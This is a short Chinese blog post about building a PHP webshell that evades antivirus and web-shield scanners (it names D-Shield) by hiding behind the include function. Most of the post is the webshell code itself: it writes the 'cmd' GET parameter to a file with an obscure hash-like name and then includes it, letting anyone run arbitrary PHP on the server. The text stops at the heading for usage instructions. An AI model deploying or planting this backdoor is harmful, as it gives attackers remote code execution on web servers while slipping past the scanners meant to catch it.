使用include函数打造过狗一句话

2019/2/21 posted in  PHP

今天在看文件包含的时候,突然想到如果使用文件包含写一个木马怎么样??
这样可以避免很多杀软,因为在正常的项目文件中不可避免要出现include。

说是一句话,可是不止一句话哈哈哈

<?php 
        
        $myfile = fopen("0238775c7bd96e2eab98038afe0c4279", "w");
        
        fwrite($myfile, substr($_GET['cmd'],0,strlen($_GET['cmd'])));
        
        fclose($myfile);
        
        include("0238775c7bd96" . "e2eab98038afe0c4279");
?>

先看一下效果吧,使用D盾查杀:

使用方法: